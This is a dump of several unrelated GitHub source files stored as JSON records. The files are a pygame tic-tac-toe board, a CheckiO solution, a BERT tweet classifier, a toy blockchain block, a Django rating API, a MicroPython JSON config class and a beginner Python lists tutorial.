tuple\n self.square_width: int\n self.line_width: int\n self.width: int\n self.line_color: tuple\n\n\n Methods\n ------\n draw_shape(col=int, row=int, player=int)\n draws the players move on the tic tac toe board\n \n __check_available_square(col=int, row=int)\n checks if the selected square is available to be marked\n \n draw_circle(window = window, color = tuple, x= int, y=int)\n Draws the circle for the player\n\n draw_lines(window= window)\n draws the line that makes it a 3x3 grid\n \n __draw_horizontal_winning_line(window= Window obj, col=int)\n draws a horizontal winning line\n\n\n __draw_diagonal_winning_line_2(window = Window obj, row= int)\n draws a diagonal_line for the ... 
side\n\n __draw_vertical_winning_line(window = Window obj, row= int)\n draws a vertical line\n \n\n __draw_left_diagonal_winning_line(window = Window obj, row=int)\n draws the left diagonal winning line\n\n __draw_diagonal_winning_line_2(window = Window obj, row = int)\n draws the diagonal winning_line from the right corner\n\n __check_win(player = int, window = Window obj)\n Checks if a player has won the game\n\n __mark_board_full(row = int, col = int)\n Marks the board full if the grid is full\n\n \"\"\"\nimport numpy\nimport pygame\n\n\nclass Board:\n \"\"\"A class to create the tic-tac-toe play board\"\"\"\n\n def __init__(self):\n self.rows = 3\n self.columns = 3\n self.__board = numpy.zeros((self.rows, self.columns))\n print(__doc__)\n self.color = (255, 255, 255)\n self.square_width = 200\n self.line_width = 20\n self.width = 600\n self.line_color = (255, 255, 255)\n \n \n def get_board(self):\n return self.__board\n\n def draw_shape(self, col, row, player):\n \"\"\"Creates the tic tac toe player board with rows and columns 3x3\n Parameters\n ----------\n col : int\n column to draw the shape\n row : int\n row to draw the shape\n player : int\n player which draws the shape\n\n \"\"\"\n # Starts with zero so, 0,1,2\n game_board = self.get_board()\n game_board[col][row] = player\n # self.__board[col][row] = player\n # print(self.board)\n\n def __check_available_square(self, col, row):\n \"\"\"Checks if the square is already marked\n Parameters\n ----------\n col : int\n Marked column to check if available\n row : int\n Marked row to check if available\n \"\"\"\n if self.__board[col][row] == 0:\n return True\n elif self.__board[col][row] == 1 or self.__board[col][row] == 2:\n return False\n\n def draw_circle(self, window, color, x, y):\n \"\"\"Draws a circle on the surface\n window : Window object\n window where the shape will be drawn on\n color : tuple\n tuple to pass the rgb values for the color\n x : int\n x value to draw the circle\n y: int\n y value to draw the circle\n \n \"\"\"\n circle = pygame.draw.circle(window, color, (x, y), 50, 10)\n pygame.display.update()\n return circle\n\n def draw_lines(self, window):\n \"\"\"Draw the horizontal and vertical lines for the tic tac toe game\n window : Window object\n window where the shape will be drawn on\n \"\"\"\n pygame.draw.line(\n window,\n self.color,\n (self.square_width, 0),\n (self.square_width, 600),\n self.line_width,\n )\n pygame.draw.line(\n window,\n self.color,\n (self.square_width * 2, 0),\n (self.square_width * 2, 600),\n self.line_width,\n )\n\n # color, start-end pos\n # x,y, x, y\n pygame.draw.line(\n window,\n self.color,\n (0, self.square_width),\n (self.width, self.square_width),\n self.line_width,\n )\n\n pygame.draw.line(\n window,\n self.color,\n (0, self.square_width * 2),\n (self.width, self.square_width * 2),\n self.line_width,\n )\n pygame.display.update()\n\n def __draw_horizontal_winning_line(self, window, col):\n \"\"\"Draws horizontal winning line\n window: Window object\n window where the shape will be drawn on\n col: int\n columns to draw the horizontal winning line\n \"\"\"\n pos_y = col * 200 + 100\n pygame.draw.line(window, (255, 0, 0), (15, pos_y), (self.width - 15, pos_y), 15)\n pygame.display.update()\n return True\n\n def __draw_vertical_winning_line(self, window, row):\n \"\"\"Draws the vertical winning line\n window: Window object\n window where the shape will be drawn on\n row: int\n rows to draw the vertical winning line\n \n \"\"\"\n pos_x = row * 200 + 100\n pygame.draw.line(\n window, 
(self.line_color), (pos_x, 25), (pos_x, self.width - 15), 15\n )\n pygame.display.update()\n return True\n\n def __draw_left_diagonal_winning_line(self, window, row):\n \"\"\"Draw the left diagonal winning line\n window: Window object\n window where the shape will be drawn on\n row: int\n rows to draw the left diagonal winning line\n \"\"\"\n pos_x = row * 200 + 100\n pygame.draw.line(\n window, (self.line_color), (90, 25), (pos_x, self.width - 15), 15\n )\n pygame.display.update()\n return True\n\n def __draw_diagonal_winning_line_2(self, window):\n \"\"\"Draw the right diagonal winning line\n window: Window object\n window where the shape will be drawn on \n \"\"\"\n pygame.draw.line(\n window, (self.line_color), (self.width - 100, 90), (100, self.width), 15\n )\n pygame.display.update()\n return True\n\n def __check_win(self, player, window):\n \"\"\"Method which checks if the player has won\n player: int\n Player who wins the game\n window: Window object\n window where the shape will be drawn on \n \n \"\"\"\n for col in range(self.columns):\n if (\n self.__board[col][0] == player\n and self.__board[col][1] == player\n and self.__board[col][2] == player\n ):\n self.__draw_horizontal_winning_line(window, col)\n return True\n\n for row in range(self.rows):\n if (\n self.__board[0][row] == player\n and self.__board[1][row] == player\n and self.__board[2][row] == player\n ):\n self.__draw_vertical_winning_line(window, row)\n return True\n\n # check diagonal win\n if (\n self.__board[0][0] == player\n and self.__board[1][1] == player\n and self.__board[2][2] == player\n ):\n self.__draw_left_diagonal_winning_line(window, row)\n return True\n\n elif (\n self.__board[2][0] == player\n and self.__board[1][1] == player\n and self.__board[0][2] == player\n ):\n self.__draw_diagonal_winning_line_2(window)\n return True\n\n def __mark_board_full(self, row, col):\n \"\"\" Checks if the 3x3 grid is full \n row: int\n rows to check if they are full\n col: int\n columns to check if they are full\n \"\"\"\n marked_spots = 0\n for row in range(self.rows):\n for col in range(self.columns):\n if self.__board[col][row] == 1 or self.__board[col][row] == 2:\n marked_spots += 1\n # print(marked_spots)\n if marked_spots == 9:\n print(\"All spots have been marked!\")\n return True","repo_name":"AriefBadal23/Tic-Tact-Toe","sub_path":"Board.py","file_name":"Board.py","file_ext":"py","file_size_in_byte":8436,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"12905932673","text":"#!/usr/local/bin/checkio --domain=py run all-the-same\n\n# In this mission you should check if all elements in the given list are equal.\n# \n# Input:List.\n# \n# Output:Bool.\n# \n# The idea for this mission was found on Python Tricks series by Dan Bader\n# \n# Precondition:all elements of the input list are hashable\n# \n# \n# END_DESC\n\nfrom typing import List, Any\n\ndef all_the_same(elements: List[Any]) -> bool:\n for i in elements:\n if i != elements[0]:\n return False\n return True","repo_name":"Chronona/PyCheckioSolutions","sub_path":"py_checkio_solutions/Home/all_the_same.py","file_name":"all_the_same.py","file_ext":"py","file_size_in_byte":496,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"73092827037","text":"import numpy as np\r\nimport pandas as pd\r\nimport random\r\nimport re\r\nimport csv\r\nimport torch\r\nfrom prettytable import PrettyTable\r\nfrom transformers import BertTokenizer, 
BertForSequenceClassification, AdamW\r\nrandom.seed(0)\r\nnp.random.seed(0)\r\ntorch.manual_seed(0)\r\ntorch.cuda.manual_seed_all(0)\r\n\r\n# Assuming that we are on a CUDA machine, this should print a CUDA device:\r\ndevice = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\")\r\nprint(device)\r\n\r\n#Read the data\r\ntrain_df = pd.read_csv('train.csv')\r\ntest_df = pd.read_csv('test.csv')\r\n\r\n#add keyword to text\r\ntrain_df['keyword'] = train_df['keyword'].fillna('nokeyword')\r\ntrain_df['text'] = train_df['keyword'] + ' ' + train_df['text']\r\ntest_df['keyword'] = test_df['keyword'].fillna('nokeyword')\r\ntest_df['text'] = test_df['keyword'] + ' ' + test_df['text']\r\n\r\n\r\n#Clean the data\r\ndef cleandata(text):\r\n text = text.lower()\r\n #Remove webpage\r\n text = re.sub(r'http://\\S+', '', text)\r\n text = re.sub(r'https://\\S+', '', text)\r\n text = re.sub(r'http', '', text)\r\n #Remove mention\r\n text = re.sub(r'@\\S+', '', text)\r\n text = re.sub(r'@', '', text)\r\n text = re.sub(r'via', '', text)\r\n #Remove some sign\r\n text = re.sub(r'#', '', text)\r\n text = re.sub(r'_', '', text)\r\n text = re.sub(r'[*]', '', text)\r\n text = re.sub(r';\\)', '', text)\r\n text = re.sub(r':\\)', '', text)\r\n text = re.sub(r'-', '', text)\r\n text = re.sub(r':', '', text)\r\n text = re.sub(r';', '', text)\r\n text = re.sub(r'<', '', text)\r\n text = re.sub(r'=', '', text)\r\n text = re.sub(r'>', '', text)\r\n text = re.sub('\\+', '', text)\r\n text = re.sub(r'\\n', ' ', text)\r\n text = re.sub(r'\\'', '', text)\r\n text = re.sub(r'\\|', '', text)\r\n text = re.sub('\\[', '', text)\r\n text = re.sub('\\]', '', text)\r\n text = re.sub('\\(', '', text)\r\n text = re.sub('\\)', '', text)\r\n #Remove redundant sign\r\n text = re.sub(r'[?]+', '?', text)\r\n text = re.sub(r'[!]+', '!', text)\r\n text = re.sub(r'[.]+', '.', text)\r\n text = re.sub('\\s+', ' ', text).strip()\r\n\r\n text = re.sub('nokeyword ', '', text)\r\n #Remove non-ascii\r\n text = text.encode(\"ascii\", errors=\"ignore\").decode()\r\n return text\r\n\r\ntrain_df['text'] = train_df['text'].apply(cleandata)\r\ntest_df['text'] = test_df['text'].apply(cleandata)\r\n\r\n#load BERT tokenizer\r\ntokenizer = BertTokenizer.from_pretrained('bert-base-uncased', do_lower_case=True)\r\n\r\n#find the maximum length of our dataset\r\nmax_len = 0\r\nfor sentence in train_df[\"text\"]:\r\n input_id = tokenizer.encode(sentence, add_special_tokens=True)\r\n max_len = max(max_len, len(input_id))\r\nfor sentence in test_df[\"text\"]:\r\n input_id = tokenizer.encode(sentence, add_special_tokens=True)\r\n max_len = max(max_len, len(input_id))\r\nprint(\"maximum length is \", max_len)\r\n\r\n#tokenize text\r\ninput_ids = []\r\nattention_masks = []\r\nfor sentence in train_df[\"text\"]:\r\n train_df_encode = tokenizer.encode_plus(sentence, add_special_tokens=True, max_length=max_len, padding='max_length',\r\n return_attention_mask=True, return_tensors='pt')\r\n input_ids.append(train_df_encode[\"input_ids\"])\r\n attention_masks.append(train_df_encode[\"attention_mask\"])\r\n\r\ninput_ids_test = []\r\nattention_masks_test = []\r\nfor sentence in test_df[\"text\"]:\r\n test_df_encode = tokenizer.encode_plus(sentence, add_special_tokens=True, max_length=max_len, padding='max_length',\r\n return_attention_mask=True, return_tensors='pt')\r\n input_ids_test.append(test_df_encode[\"input_ids\"])\r\n attention_masks_test.append(test_df_encode[\"attention_mask\"])\r\n\r\n#convert to tensor\r\ninput_ids = torch.cat(input_ids, 
dim=0)\r\nattention_masks = torch.cat(attention_masks, dim=0)\r\ntargets = torch.Tensor(train_df['target'])\r\ntargets = targets.long()\r\n\r\ninput_ids_test = torch.cat(input_ids_test, dim=0)\r\nattention_masks_test = torch.cat(attention_masks_test, dim=0)\r\n\r\n#load data\r\ndataset = torch.utils.data.TensorDataset(input_ids, attention_masks, targets)\r\ntestset = torch.utils.data.TensorDataset(input_ids_test, attention_masks_test)\r\n\r\n#Train val split\r\ntrain_len = int(len(dataset)*0.8) #select 80% training 20% validation\r\nval_len = len(dataset) - train_len\r\ntrain_set, val_set = torch.utils.data.random_split(dataset, [train_len, val_len], generator=torch.Generator().manual_seed(0))\r\n\r\n#build dataloader\r\nbatchsize = 16\r\ntrain_set_loader = torch.utils.data.DataLoader(train_set, batch_size=batchsize, shuffle=True)\r\nval_set_loader = torch.utils.data.DataLoader(val_set, batch_size=batchsize, shuffle=False)\r\ntest_set_loader = torch.utils.data.DataLoader(testset, batch_size=batchsize, shuffle=False)\r\n\r\n#Model: BertForSequenceClassification (This idea is from \"BERT Fine-Tuning Tutorial with PyTorch\")\r\nepochs = 2\r\n\r\nmodel = BertForSequenceClassification.from_pretrained(\r\n \"bert-base-uncased\",\r\n num_labels=2)\r\nmodel.cuda()\r\noptimizer = AdamW(model.parameters(), lr=5e-6, eps=1e-8)\r\n\r\n#training\r\ntrain_loss_total = []\r\nval_loss_total = []\r\nval_acc_total = []\r\nfor epoch in range(epochs):\r\n train_loss = 0\r\n model.train()\r\n #train on training set\r\n for i, data in enumerate(train_set_loader):\r\n input_id = data[0].to(device)\r\n attention_mask = data[1].to(device)\r\n target = data[2].to(device)\r\n model.zero_grad()\r\n loss, logits = model(input_id, token_type_ids=None, attention_mask=attention_mask, labels=target)\r\n train_loss += loss.item()\r\n loss.backward()\r\n torch.nn.utils.clip_grad_norm_(model.parameters(), 1.0)\r\n optimizer.step()\r\n\r\n train_loss_total.append(train_loss/i)\r\n print('BERT: [%d] train loss: %.5f' %\r\n (epoch + 1, train_loss/i))\r\n train_loss = 0\r\n\r\n #test on validation set\r\n val_loss = 0\r\n val_accuracy = 0\r\n val_correct = 0\r\n val_total = 0\r\n model.eval()\r\n for i, data in enumerate(val_set_loader):\r\n input_id = data[0].to(device)\r\n attention_mask = data[1].to(device)\r\n target = data[2].to(device)\r\n with torch.no_grad():\r\n loss, logits = model(input_id,token_type_ids=None, attention_mask=attention_mask, labels=target)\r\n val_loss += loss.item()\r\n logits = logits.detach().cpu().numpy()\r\n label = target.to('cpu').numpy()\r\n pred_flat = np.argmax(logits, axis=1).flatten()\r\n label_flat = label.flatten()\r\n val_correct += np.sum(pred_flat == label_flat)\r\n val_total += len(label_flat)\r\n\r\n val_loss_total.append(val_loss/i)\r\n print('BERT: [%d] val loss: %.5f' %\r\n (epoch + 1, val_loss/i))\r\n val_loss = 0\r\n\r\n val_accuracy = val_correct/val_total\r\n val_acc_total.append(val_accuracy)\r\n print(\"validation accuracy is \", val_accuracy)\r\n\r\n#Form a table\r\nTable_BERT = PrettyTable()\r\nTable_BERT_title = (np.arange(epochs) + 1).tolist()\r\nTable_BERT_title.insert(0,'number of epochs')\r\nTable_BERT.field_names = Table_BERT_title\r\n\r\nTable_BERT_train = train_loss_total.copy()\r\nTable_BERT_train.insert(0,\"train_loss_total\")\r\nTable_BERT.add_row(Table_BERT_train)\r\n\r\nTable_BERT_val = val_loss_total.copy()\r\nTable_BERT_val.insert(0,\"val_loss_total\")\r\nTable_BERT.add_row(Table_BERT_val)\r\n\r\nTable_BERT_acc = 
val_acc_total.copy()\r\nTable_BERT_acc.insert(0,\"val_acc_total\")\r\nTable_BERT.add_row(Table_BERT_acc)\r\nprint(Table_BERT)\r\n\r\nprint()\r\n\r\n#train on all data\r\nmodel = BertForSequenceClassification.from_pretrained(\r\n \"bert-base-uncased\",\r\n num_labels=2)\r\nmodel.cuda()\r\noptimizer = AdamW(model.parameters(), lr=5e-6, eps=1e-8)\r\n\r\ntrain_all_loader = torch.utils.data.DataLoader(dataset, batch_size=batchsize, shuffle=True)\r\n\r\ntrain_loss_total = []\r\nfor epoch in range(epochs):\r\n train_loss = 0\r\n model.train()\r\n #train on training set\r\n for i, data in enumerate(train_all_loader):\r\n input_id = data[0].to(device)\r\n attention_mask = data[1].to(device)\r\n target = data[2].to(device)\r\n model.zero_grad()\r\n loss, logits = model(input_id, token_type_ids=None, attention_mask=attention_mask, labels=target)\r\n train_loss += loss.item()\r\n loss.backward()\r\n torch.nn.utils.clip_grad_norm_(model.parameters(), 1.0)\r\n optimizer.step()\r\n\r\n train_loss_total.append(train_loss/i)\r\n print('BERT: [%d] train loss: %.5f' %\r\n (epoch + 1, train_loss/i))\r\n train_loss = 0\r\n\r\n#predict test\r\ntest_pred = []\r\nprediction = []\r\nmodel.eval()\r\nfor _, data in enumerate(test_set_loader):\r\n input_id = data[0].to(device)\r\n attention_mask = data[1].to(device)\r\n with torch.no_grad():\r\n output = model(input_id, token_type_ids=None, attention_mask=attention_mask)\r\n logits = output[0]\r\n logits = logits.detach().cpu().numpy()\r\n test_pred = np.argmax(logits, axis=1).flatten()\r\n prediction = np.concatenate((prediction, test_pred))\r\nprediction = prediction.astype(np.int64)\r\n#Write my prediction into CSV file\r\nlen_test = len(test_df)\r\nindex_test = []\r\nfor i in range(len_test):\r\n index_test.append(test_df['id'][i])\r\n\r\nwith open(\"labels.csv\", 'w', newline='') as file:\r\n writer = csv.writer(file)\r\n writer.writerow(['id', 'target'])\r\n for i in range(len_test):\r\n writer.writerow([index_test[i], prediction[i]])\r\n\r\nprint()\r\n","repo_name":"Yi-fei-X/kaggle_NLP_disaster_tweets","sub_path":"Bert.py","file_name":"Bert.py","file_ext":"py","file_size_in_byte":9271,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"832171640","text":"from .utils import sha3_256, simple_encode\n\nclass Block():\n def __init__(self, header=None, transactions=None):\n if not header:\n raise ValueError(\"Argument 'header' is not provided.\")\n self.header = header\n self.transactions = transactions or []\n\n # Flag to indicate if the block is a candidate\n self._is_candidate = False\n\n def from_prevstate(self, state=None, timestamp=None):\n if not state:\n raise ValueError(\"Argument 'state' is not provided.\")\n\n prev_header = state.prev_headers[0]\n next_header = {\n \"number\": prev_header.number + 1,\n \"timestamp\": timestamp or prev_header.timestamp + 1,\n \"prevhash\": prev_header.hash,\n \"difficulty\": prev_header.difficulty,\n \"nonce\": \"\"\n }\n\n self.header.number = next_header[\"number\"]\n self.header.timestamp = next_header[\"timestamp\"]\n self.header.prevhash = next_header[\"prevhash\"]\n self.header.difficulty = next_header[\"difficulty\"]\n self.header.nonce = next_header[\"nonce\"]\n\n return self\n\n def make_roots(self, state):\n self.header.state_root = state.root_hash\n self.header.tx_root = sha3_256(simple_encode([dict(tx) for tx in self.transactions]))\n\n # Mark the block as a candidate\n self._is_candidate = True\n\n @property\n def is_candidate(self):\n return 
self._is_candidate\n\n def mine(self, start_nonce=0, max_nonce=2**64):\n \"\"\"\n Simple proof-of-work algorithm\n \"\"\"\n\n # Check if the block is a candidate\n assert self.is_candidate, \"Block should be a candidate in order to perform pow mining.\"\n\n # calculate the difficulty target\n target = (2**256 // self.header.difficulty) - 1\n block_hash = self.header.hash\n\n for nonce in range(max_nonce):\n hash_result = sha3_256(block_hash + bytes(nonce))\n\n # check if this is a valid result, below the target\n num = int.from_bytes(hash_result, byteorder=\"big\")\n if num < target:\n self.header.nonce = nonce\n return nonce\n\n return None\n\n def validate(self):\n return True\n\n def verify(self):\n return True\n\n def __iter__(self):\n return iter([\n (\"header\", dict(self.header)),\n (\"transactions\", [dict(tx) for tx in self.transactions])\n ])\n","repo_name":"ccniuj/simblock","sub_path":"simblock/block.py","file_name":"block.py","file_ext":"py","file_size_in_byte":2450,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"51"} +{"seq_id":"12111258211","text":"from django.core.exceptions import ObjectDoesNotExist\nfrom drf_spectacular.utils import extend_schema\nfrom drf_spectacular.utils import extend_schema_view\nfrom rest_framework import mixins\nfrom rest_framework import status\nfrom rest_framework import viewsets\nfrom rest_framework.decorators import action\nfrom rest_framework.permissions import IsAuthenticated\nfrom rest_framework.response import Response\n\nfrom api.serializers.rating.api import CreateRatingSerializer\nfrom api.serializers.rating.api import UpdateRatingSerializer\nfrom movies.models import Raiting\n\n\n@extend_schema_view(\n change_rating=extend_schema(summary=\"Change rating of film\", tags=[\"Rating\"])\n)\nclass RatingView(mixins.CreateModelMixin, viewsets.GenericViewSet):\n permission_classes = (IsAuthenticated,)\n queryset = Raiting.objects.all()\n\n serializer_action_classes = {\n \"create\": CreateRatingSerializer,\n \"change_rating\": UpdateRatingSerializer,\n }\n\n def get_serializer_context(self):\n return {\n \"request\": self.request,\n }\n\n def get_serializer_class(self):\n \"\"\"Return the serializer class based on the request method\"\"\"\n try:\n return self.serializer_action_classes[self.action]\n except (KeyError, AttributeError):\n return super().get_serializer_class()\n\n def create(self, request, *args, **kwargs):\n movie = request.data.get(\"movie\")\n if Raiting.objects.filter(user=request.user, movie=movie).exists():\n return Response(\n {\"detail\": \"Rating already exists for this movie.\"},\n status=status.HTTP_400_BAD_REQUEST,\n )\n serializer = CreateRatingSerializer(\n data=request.data, context={\"request\": request}\n )\n if serializer.is_valid():\n serializer.save()\n return Response(\n {\"detail\": \"Rating saved successfully.\"},\n status=status.HTTP_201_CREATED,\n )\n else:\n return Response(\n {\"detail\": \"Invalid rating data.\"},\n status=status.HTTP_400_BAD_REQUEST,\n )\n\n @action(methods=[\"patch\"], detail=False, url_path=\"change_rating\")\n def change_rating(self, request):\n user = request.user\n movie = request.data.get(\"movie\")\n rating_value = request.data.get(\"rating\") # noqa: F841\n\n try:\n rating = Raiting.objects.get(user=user, movie=movie)\n serializer = self.get_serializer(rating, data=request.data, partial=True)\n if serializer.is_valid():\n rating = serializer.change_rating(rating, serializer.validated_data)\n return Response({\"message\": \"Rating 
updated successfully\"})\n else:\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n except ObjectDoesNotExist:\n serializer = self.get_serializer(data=request.data)\n if serializer.is_valid():\n rating = serializer.save()\n return Response(\n {\"message\": \"Rating created successfully\"},\n status=status.HTTP_201_CREATED,\n )\n else:\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n","repo_name":"DmitriBe1ov/Graduation_project","sub_path":"MovieSearcher/api/views/rating_view.py","file_name":"rating_view.py","file_ext":"py","file_size_in_byte":3315,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"43361927016","text":"import json\nimport re\nimport uos\nfrom tools import useful\n\nself_config = None\nclass JsonConfig:\n\t\"\"\" Manage json configuration \"\"\"\n\tdef __init__(self):\n\t\t\"\"\" Constructor \"\"\"\n\t\tself.modification_date = 0\n\n\tdef config_root(self):\n\t\t\"\"\" Configuration root path \"\"\"\n\t\tif useful.ismicropython():\n\t\t\treturn \"/config\"\n\t\telse:\n\t\t\treturn \"config\"\n\n\tdef save(self, file = None, part_filename=\"\"):\n\t\t\"\"\" Save object in json file \"\"\"\n\t\ttry:\n\t\t\tfilename = self.get_pathname(useful.tofilename(part_filename))\n\t\t\tfile, filename = self.open(file=file, read_write=\"w\", part_filename=part_filename)\n\t\t\tdata = self.__dict__.copy()\n\t\t\tdel data[\"modification_date\"]\n\t\t\tjson.dump(useful.tostrings(data),file)\n\t\t\tfile.close()\n\t\t\tself.modification_date = uos.stat(filename)[8]\n\t\t\treturn True\n\t\texcept Exception as err:\n\t\t\tuseful.syslog(err, \"Cannot save %s \"%(filename))\n\t\t\treturn False\n\n\tdef to_string(self):\n\t\t\"\"\" Convert the configuration to string \"\"\"\n\t\tdata = self.__dict__.copy()\n\t\tdel data[\"modification_date\"]\n\t\treturn json.dumps(useful.tostrings(data))\n\n\tdef get_pathname(self, part_filename=\"\"):\n\t\t\"\"\" Get the configuration filename according to the class name \"\"\"\n\t\treturn self.config_root()+\"/\"+self.get_filename(part_filename) + \".json\"\n\n\tdef list_all(self):\n\t\t\"\"\" List all configuration files \"\"\"\n\t\tresult = []\n\t\tpattern = self.get_filename() + \".*\"\n\t\tfor fileinfo in uos.ilistdir(self.config_root()):\n\t\t\tname = fileinfo[0]\n\t\t\ttyp = fileinfo[1]\n\t\t\tif typ & 0xF000 != 0x4000:\n\t\t\t\tif re.match(pattern, name):\n\t\t\t\t\tresult.append(useful.tobytes(name[len(self.get_filename()):-len(\".json\")]))\n\t\treturn result\n\n\tdef get_filename(self, part_filename=\"\"):\n\t\t\"\"\" Return the config filename \"\"\"\n\t\tif self.__class__.__name__[-len(\"Config\"):] == \"Config\":\n\t\t\tname = self.__class__.__name__[:-len(\"Config\")]\n\t\telse:\n\t\t\tname = self.__class__.__name__\n\t\treturn name + useful.tostrings(part_filename)\n\n\tdef open(self, file=None, read_write=\"r\", part_filename=\"\"):\n\t\t\"\"\" Create or open configuration file \"\"\"\n\t\tfilename = file\n\t\tif useful.exists(self.config_root()) is False:\n\t\t\tuseful.makedir(self.config_root())\n\t\tif file is None:\n\t\t\tfilename = self.get_pathname(useful.tofilename(part_filename))\n\t\t\tfile = open(filename, read_write)\n\t\telif type(file) == type(\"\"):\n\t\t\tfile = open(filename, read_write)\n\t\treturn file, filename\n\n\tdef update(self, params):\n\t\t\"\"\" Update object with html request params \"\"\"\n\t\tglobal self_config\n\t\tif b\"name\" in params and b\"value\" in params and len(params) == 2:\n\t\t\tsetmany = 
False\n\t\t\tparams = {params[b\"name\"]:params[b\"value\"]}\n\t\telse:\n\t\t\tsetmany = True\n\t\tself_config = self\n\t\tfor name in self.__dict__.keys():\n\t\t\t# Case of web input is missing when bool is false\n\t\t\tif type(self.__dict__[name]) == type(True):\n\t\t\t\tname = useful.tobytes(name)\n\t\t\t\tif name in params:\n\t\t\t\t\tif type(params[name]) == type(\"\"):\n\t\t\t\t\t\tif params[name] == \"\":\n\t\t\t\t\t\t\tparams[name] = True\n\t\t\t\t\t\telif params[name] == \"1\" or params[name].lower() == \"true\":\n\t\t\t\t\t\t\tparams[name] = True\n\t\t\t\t\t\telif params[name] == \"0\" or params[name].lower() == \"false\":\n\t\t\t\t\t\t\tparams[name] = False\n\t\t\t\t\telif type(params[name]) == type(b\"\"):\n\t\t\t\t\t\tif params[name] == b\"\":\n\t\t\t\t\t\t\tparams[name] = True\n\t\t\t\t\t\telif params[name] == b\"1\" or params[name].lower() == b\"true\":\n\t\t\t\t\t\t\tparams[name] = True\n\t\t\t\t\t\telif params[name] == b\"0\" or params[name].lower() == b\"false\":\n\t\t\t\t\t\t\tparams[name] = False\n\t\t\t\telse:\n\t\t\t\t\tif setmany:\n\t\t\t\t\t\tparams[name] = False\n\t\t\t# Case of web input is integer but string with number received\n\t\t\telif type(self.__dict__[name]) == type(0) or type(self.__dict__[name]) == type(0.):\n\t\t\t\tname = useful.tobytes(name)\n\t\t\t\tif name in params:\n\t\t\t\t\ttry:\n\t\t\t\t\t\tparams[name] = int(params[name])\n\t\t\t\t\texcept:\n\t\t\t\t\t\tparams[name] = 0\n\t\tresult = True\n\t\tfor name, value in params.items():\n\t\t\texecval = useful.tostrings(name)\n\t\t\ttry:\n\t\t\t\ttry:\n\t\t\t\t\t# pylint: disable=exec-used\n\t\t\t\t\texec(\"a = self_config.%s\"%execval)\n\t\t\t\t\texisting = True\n\t\t\t\texcept:\n\t\t\t\t\texisting = False\n\n\t\t\t\tif existing:\n\t\t\t\t\texecval = \"self_config.%s = %s\"%(execval, repr(value))\n\t\t\t\t\t# pylint: disable=exec-used\n\t\t\t\t\texec(execval)\n\t\t\t\telse:\n\t\t\t\t\tif name != b\"action\":\n\t\t\t\t\t\tprint(\"%s.%s not existing\"%(self.__class__.__name__, useful.tostrings(name)))\n\t\t\texcept Exception as err:\n\t\t\t\tuseful.syslog(err, \"Error on %s\"%(execval))\n\t\t\t\tresult = False\n\t\tdel self_config\n\t\treturn result\n\n\tdef load(self, file = None, part_filename=\"\"):\n\t\t\"\"\" Load object with the file specified \"\"\"\n\t\ttry:\n\t\t\tfilename = self.get_pathname(useful.tofilename(part_filename))\n\t\t\tfile, filename = self.open(file=file, read_write=\"r\", part_filename=part_filename)\n\t\t\tself.update(useful.tobytes(json.load(file)))\n\t\t\tfile.close()\n\t\t\treturn True\n\t\texcept OSError as err:\n\t\t\tif err.args[0] == 2:\n\t\t\t\tuseful.syslog(\"Not existing %s \"%(filename))\n\t\t\telse:\n\t\t\t\tuseful.syslog(err, \"Cannot load %s \"%(filename))\n\t\t\treturn False\n\t\texcept Exception as err:\n\t\t\tuseful.syslog(err, \"Cannot load %s \"%(filename))\n\t\t\treturn False\n\n\tdef forget(self, part_filename=\"\"):\n\t\t\"\"\" Forget configuration \"\"\"\n\t\tfilename = self.get_pathname(part_filename=part_filename)\n\t\tuseful.remove(self.config_root()+\"/\"+filename)\n\n\tdef is_changed(self, part_filename=\"\"):\n\t\t\"\"\" Indicates if the configuration changed \"\"\"\n\t\ttry:\n\t\t\tmodification_date = uos.stat(self.get_pathname(useful.tofilename(part_filename)))[8]\n\t\t\tif self.modification_date != modification_date:\n\t\t\t\tself.modification_date = modification_date\n\t\t\t\treturn True\n\t\texcept:\n\t\t\tpass\n\t\treturn 
False\n","repo_name":"yansinan/py-pycameresp","sub_path":"lib/tools/jsonconfig.py","file_name":"jsonconfig.py","file_ext":"py","file_size_in_byte":5424,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"51"} +{"seq_id":"37947137171","text":"numbers = [1, 2, 5]\nprint(5 in numbers)\nprint(5 not in numbers)\n\ncities = [\"Kiev\", \"London\", \"Los Angeles\"]\n\nfor city in cities:\n print(city)\n\nnumbers = [42, 77, 16, 101, 23, 8, 4, 15, 55]\nnumbers.sort()\n\nfor number in numbers:\n if number > 42:\n break\n print(number)\n\nimport random\nnumbers = []\n\nwhile len(numbers) < 5:\n numbers.append(random.randint(1, 100))\n\nfor number in numbers:\n print(number)\n if number >= 90:\n print('Found at least one number greater than 90')\n break\nelse:\n print('No numbers greater than 90')\n\nprint('Complete')\n\nsuits = [\"Hearts\", \"Spades\", \"Clubs\", \"Diamonds\"]\nranks = [\"2\", \"3\", \"4\", \"5\", \"6\", \"7\", \"8\", \"9\", \"10\", \"Jack\", \"Queen\", \"King\", \"Ace\"]\n\nfor suit in suits:\n for rank in ranks:\n print(f'{rank} of {suit}') \n\n numbers = [42, 77, 16, 101, 23, 8, 4, 15, 55]\nselected_number = random.choice(numbers)\nprint(selected_number)\n\nselected_numbers = random.choices(numbers, k=3)\nprint(selected_numbers)\n\nimport random\n\nsuits = [\"Hearts\", \"Spades\", \"Clubs\", \"Diamonds\"]\nranks = [\"2\", \"3\", \"4\", \"5\", \"6\", \"7\", \"8\", \"9\", \"10\", \"Jack\", \"Queen\", \"King\", \"Ace\"]\ndeck = []\n\nfor suit in suits:\n for rank in ranks:\n deck.append(f'{rank} of {suit}')\n\nprint(f'There are {len(deck)} cards in the deck.')\n\nprint('Dealing ...')\n\nhand = []\n\nwhile len(hand) < 5:\n card = random.choice(deck)\n deck.remove(card)\n hand.append(card)\n\nprint(f'There are {len(deck)} cards in the deck.')\nprint('Player has the following cards in their 